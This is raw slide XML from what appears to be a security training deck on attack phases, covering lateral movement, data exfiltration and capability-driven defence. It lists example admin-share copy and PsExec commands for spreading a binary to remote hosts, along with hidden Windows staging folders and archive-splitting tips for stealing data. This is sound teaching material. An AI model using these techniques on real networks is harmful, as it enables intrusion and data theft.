            <a:endParaRPr lang="en-GB" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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57213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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57213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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57213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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57213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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57213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-557213">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="557213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4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5331" y="3567632"/>
            <a:ext cx="3793337" cy="259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51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2296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Phase 4: Lateral Movement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83820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en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Moving from host to host within the target network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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/>
              <a:t>Simple file transfer via admin shares, and execution via net/at commands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/>
              <a:t>NT Resource kit tools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/>
              <a:t>3rd Party System Admin tools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/>
              <a:t>Custom tools (ex: use native API calls)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2296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Phase 4: Lateral Movement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83820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en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Example Syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Net use \\some_workstion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> mybin.exe \\some_workstation\C$\temp\mybin.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> \\some_workstation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Or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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>4.    Push out agent via various update tool (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>altiris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, Microsoft SMS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buAutoNum type="arabicPeriod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2296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Phase 5: Data Exfiltration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83820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en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Getting business critical data out of the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1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Exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>eks-fil-treyt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>]. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>verb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>,: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>− </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>To surreptitiously move personnel or materials out of an area under enemy control. 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/>
              <a:t>In computing terms, exfiltration is the unauthorized removal of data from a network. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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/>
              <a:t>Simple data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>exfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> via any port/protocol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it-IT" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Simple data exfil via HTTP/DNS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err="1" smtClean="0"/>
              <a:t>Exfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> via HTTPS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/>
              <a:t>Authenticated proxy aware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>exfil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2296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Phase 5: Data Exfiltration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83820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000" dirty="0" smtClean="0"/>
              <a:t>Easier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to move things in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>small packages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>RAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, ZIP, and CAB files. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Makecab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>built-in to Windows </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Most systems have 7zip, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>winRAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>,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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>All those allow for password protected files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Most allow you to break big files into pieces of X size</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Staging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>areas </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Locations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to aggregate data before sending it out </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Easier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to track tools and stolen data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Fewer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>connections to external drops </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Typically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>workstations – plenty of storage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Is it abnormal for workstations to have high bandwidth usage? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"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2296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Phase 5: Data Exfiltration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83820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sz="2000" dirty="0" smtClean="0"/>
              <a:t>Fancy way</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pP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631" y="2209800"/>
            <a:ext cx="7792538" cy="384863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3748252" y="38100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600200" y="3505200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66800" y="4134118"/>
            <a:ext cx="0" cy="666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447800" y="3962400"/>
            <a:ext cx="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00200" y="3810000"/>
            <a:ext cx="1295400" cy="3241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900652" y="4134118"/>
            <a:ext cx="990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019800" y="3276600"/>
            <a:ext cx="1066800" cy="8575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436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2296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Phase 5: Data Exfiltration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83820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sz="2000" dirty="0" smtClean="0"/>
              <a:t>More Explanation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pP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171524"/>
            <a:ext cx="6621778" cy="369587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953000" y="3581400"/>
            <a:ext cx="1219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800600" y="50292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4631055"/>
            <a:ext cx="796289" cy="796289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2133600" y="3581400"/>
            <a:ext cx="1524000" cy="1049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438400" y="4106227"/>
            <a:ext cx="1219200" cy="92297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682489" y="4000500"/>
            <a:ext cx="1489711" cy="8763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361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2296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Phase 5: Data Exfiltration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83820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sz="2000" dirty="0" smtClean="0"/>
              <a:t>What normally happens…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean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362200"/>
            <a:ext cx="8301767" cy="3515163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>
            <a:off x="3352800" y="4119781"/>
            <a:ext cx="14838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981200" y="42672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17" name="Straight Arrow Connector 34816"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1981200" y="4648200"/>
            <a:ext cx="457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21" name="Straight Arrow Connector 34820"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="4648200"/>
            <a:ext cx="1219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23" name="Straight Arrow Connector 34822"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5791200" y="3505200"/>
            <a:ext cx="9144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05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2296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Phase 5: Data Exfiltration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83820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en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Staging Points (from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Mandiant’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> “The Getaway”)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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>systemdrive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>%\RECYCLER </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>− Recycle Bin maps to subdirectories for each user SID </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>− Hidden directory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>− Root directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>shouldn‟t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> contain any files 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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>systemdrive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>%\System Volume Information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>− Subdirectories contain Restore Point folders </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>− Hidden directory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>− Access restricted to SYSTEM by default </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>− </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Root directory typically only contains “tracking.log” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1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8207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2296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Phase 5: Data Exfiltration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83820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en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Staging Points (from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Mandiant’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> “The Getaway”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>systemroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>%\Tasks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Special” folder – Windows hides contents in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Explorer </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>directory only contains scheduled .job files, “SA.dat” and “desktop.ini” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Countless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>other hiding spots… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>− %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>systemroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>%\system32 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>− %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>systemroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>%\debug </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>− User temp folders </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>− Trivial to hide from most users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>− Staging points vary on OS, attacker privileges </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1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5529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2296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Vulnerability Driven VS. Capability Driven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83820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Today’s Information Assurance Programs are comprised of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Vulnerability Management (aka patch management)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>User Awareness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Documentation of the first 2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Vulnerabilities are transient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Everyday you patch, everyday there’s more to patch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If the attacker isn’t relying on the presence of vulnerabilities in order to make his attack work you are in for a world of hurt!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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="1600200"/>
            <a:ext cx="7026275" cy="1895475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Let me take you back.... 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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="16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1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2296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Vulnerability Driven VS. Capability Driven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83820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Instead of saying  “Mr. Customer, you have 600 highs, 1200 mediums, and 5000 lows”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We saying “Mr. Customer, you able to detect and respond to a level 3 attack (basically organized crime)”.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Level 1:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Kiddie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Level 2:	Got some game</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Level 3:	Organized crime/hacker for hire</a:t>
